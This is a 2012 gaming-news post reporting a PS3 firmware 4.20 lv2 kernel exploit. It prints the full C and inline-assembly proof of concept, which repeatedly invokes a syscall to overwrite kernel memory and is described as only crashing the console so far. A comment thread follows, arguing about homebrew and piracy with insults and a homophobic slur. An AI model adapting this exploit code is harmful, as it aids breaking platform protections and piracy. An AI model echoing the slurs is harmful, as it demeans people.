KDSBest And His lv2 Exploit

Submitted by tbag; September 23, 2012

Well known developer KDSBest has released his lv2 exploit to the development community with the hopes of hacking the PS3 wide open to the world of homebrew. Using Firmware 4.20 KDSBest has managed to achieve a lv2 exploit on the PS3, unfortunately at this point all he has managed to do is crash the PS3 due to an overwriting of some memory addresses but in the right hands and some hard work we could see progress in the future, who knows.

//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf

register unsigned long long payloadHolder2 asm (“r21″);
register unsigned long long payloadHolder asm (“r20″);
register unsigned long long stackpointer asm (“r1″);
register unsigned long long counter asm (“r25″);
register unsigned long long bufferStackpointer asm (“r26″);

int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;

payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;

// Incrementer
counter = 0×00;

// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8… bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall

asm(“li %r0, 0×0″);
asm(“li %r3, 0×6″);
asm(“li %r4, 0×1″);
// li r11, 0x24F -> PANIC
asm(“mr %r22, %r20″);
asm(“mr %r23, %r20″);
asm(“mr %r24, %r20″);
asm(“mr %r27, %r20″);
asm(“mr %r28, %r20″);
asm(“mr %r29, %r20″);
asm(“mr %r30, %r20″);
asm(“mr %r31, %r20″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

// We write sc
asm(“mr %r22, %r21″);
asm(“mr %r23, %r21″);
asm(“mr %r24, %r21″);
asm(“mr %r27, %r21″);
asm(“mr %r28, %r21″);
asm(“mr %r29, %r21″);
asm(“mr %r30, %r21″);
asm(“mr %r31, %r21″);

// Stack Pointer = Build Address of LV2
stackpointer += counter;

// Syscall 0xA9
asm(“li %r11, 0xA9″);
asm(“sc”);
counter += 0×04;

if(counter < 0×1000000)
goto doItAgain;

stackpointer = bufferStackpointer;
return 0;
}

Source

Tags: homebrew, kdsbest, lv2 exploit, PS3 Hacks

"cmon devs, you can do better than this... we don't want this shitty codes, we want a pup that we can run directly from our xmb and hack our consoles (just like in geohot days, that guy was a true hacker), so that we can download tons of games and play for free! I'm getting tired of having to come to this website erryday just to find out that you could't do it, or that you wasted my time developing shitty homebrew games or shitty apps that nobody uses... I'm getting disappointed..."

you mad already? This is what you get for trying hard: a bunch of lazy faggots that will use your knowledge to steal software. The part of the community that actually enjoys the homebrew scene for it's hacking potential, and control of a device that you own (etc, etc), represents like 5% or less of the people interested in the scene, the other 95% are the entire population of brazil, that is solely interested in play the new Fifa 13 and PES 2013 without paying, and steal software... I think that the scene should stop as it is. We have a custom fw already, and we don't need other. Nobody uses their custom firmware just to play the games that their own, this is the dumbest excuse for piracy, the old models of the ps3 are today fully hackable, and that is enough in my oppinion. =)

# RE: RE: KDSBest And His lv2 Exploit — aihooo44 2012-09-24 09:28

your so dumb this how geohots pup firmware that you used started with devs helping each other out with code like this witch will lead to a pup update file for people like you how do not do anything to help the scene but whine

# RE: RE: RE: KDSBest And His lv2 Exploit — John4565 2012-09-24 15:56

man have you read my entire post? I don't use custom firmwares! I Don't steal software, I am a game dev myself, and I DON'T WANT PPL STEALING MY WORK SOMEDAY!

# RE: RE: RE: RE: KDSBest And His lv2 Exploit — nnnjc 2012-09-25 16:13

don't worry no one will pirate your games. no one will play your games even if you pay them too.

# RE: RE: RE: RE: RE: KDSBest And His lv2 Exploit — Dbrig 2012-09-27 03:35

Well you're just one gamer. I'd like to get my own opinion, so is there any way you could email me copies of the games of his that you've played?

I'm sure that your opinion is valuable and credible since you've obviously spent so much time playing his games but I would like to try them as well.

# ` — Paulxxx 2012-09-24 09:12

John4565 - get a life, get a job and get out from internet, asshole

# huh — killpacient 2012-09-26 19:17

to be honest i can barely wait for a new cfw... i buy my games but i like to keep the discs intact ..

Refresh comments list

Add comment

JComments


	CREATE ACCOUNT NOW TO POST COMMENTS! Why create an account on the Dashhacks network? Because being logged in has its privileges! • COMMENTS! Only logged in users comments go live without waiting for moderator approval! • No video! The video ad in the upper right doesn't interrupt you on all pages! • Customize your profile! Flaunt your xBox Live & PSN gamertags! • It's FREE and it's EASY! And one login works for all of the Dashhacks review sites! So what are you waiting for? Go to the TOP RIGHT of the page and LOGIN or click REGISTER!


	Would you like to get all the new buzz from Dashhacks in your email each day? Subscribe to our Daily Digest! Want to learn more about the team bringing the news to Dash Hacks? Click here to read about them

KDSBest And His lv2 Exploit

Related Stories:

Comments

Add comment